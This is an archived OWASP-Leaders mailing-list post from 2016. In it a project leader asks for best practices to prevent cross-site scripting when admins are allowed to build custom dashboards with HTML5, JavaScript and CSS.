[Owasp-leaders] Help Required : Best Practices against XSS on custom UI creation

Dibyendu Sikdar dibyendu.coder at gmail.com
Mon Nov 28 13:24:40 UTC 2016


Hi Experts,

Recently I have come across some projects where the application allows the
admin to code and create custom dashboard using html5, javascript and css.

Now all the admins can have access to these dashboards. And just because it
can allow js to be used, a rouge admin can put an xss payload in any of
these dashboard and can perform malicious activities which can affect other
admins.

What are some best practices can you recommend here ?

-- 
*Thanks and Regards,*
*Dibyendu Sikdar*
*https://www.linkedin.com/in/dibsyhex
<https://www.linkedin.com/in/dibsyhex>*
*@dibsyhex*
*OWASP Project Leader *
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-leaders/attachments/20161128/b5cc9a56/attachment.html>


More information about the OWASP-Leaders mailing list